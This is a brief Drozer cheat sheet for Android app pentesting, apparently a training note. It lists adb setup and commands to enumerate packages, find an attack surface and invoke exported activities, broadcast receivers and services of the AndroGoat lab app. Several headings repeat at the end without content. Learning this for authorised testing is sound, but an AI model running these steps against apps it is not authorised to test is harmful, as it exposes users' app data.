1 min read Intermediate Mobile

Mobile Pentesting Drozer:

# Step 1: Start Drozer Agent on Emulator
adb shell am start -n com.mwr.dz/.Drozer

# Step 2: Set up Port Forwarding
adb forward tcp:31415 tcp:31415

# Step 3: Connect from Host to Drozer Agent
drozer console connect

Useful Drozer Commands:

# List all installed packages
run app.package.list

# Find packages with debuggable flag
run app.package.debuggable

# Search for content providers in a specific app
run app.provider.finduris -a com.target.app

# Get specific package info
run app.package.info -a com.target.app

Find attack vector:

run app.package.attacksurface owasp.sat.agoat

Analyze Acitivity, Broadcast and Service

dz> run app.activity.info -a owasp.sat.agoat
dz> run app.broadcast.info -a owasp.sat.agoat
dz> run app.service.info -a owasp.sat.agoat

Analyze Acitivity, Broadcast and Service

dz> run app.activity.info -a owasp.sat.agoat
dz> run app.broadcast.info -a owasp.sat.agoat
dz> run app.service.info -a owasp.sat.agoat

Exploit activity

dz> run app.activity.start --component owasp.sat.agoat <activity_name>

Send Broadcast to Exported Receiver

dz> run app.broadcast.send --component owasp.sat.agoat owasp.sat.agoat.ShowDataReceiver

Exploit Exported Service

dz> run app.service.start --component owasp.sat.agoat <service_name> dz> run app.service.send --component owasp.sat.agoat <service_name> dz> run app.service.start --component owasp.sat.agoat owasp.sat.agoat.DownloadInvoiceService

Useful Drozer Commands:​

Find attack vector:​

Analyze Acitivity, Broadcast and Service​

Analyze Acitivity, Broadcast and Service​

Exploit activity​

Send Broadcast to Exported Receiver​

Exploit Exported Service​

Useful Drozer Commands:

Find attack vector:

Analyze Acitivity, Broadcast and Service

Analyze Acitivity, Broadcast and Service

Exploit activity

Send Broadcast to Exported Receiver

Exploit Exported Service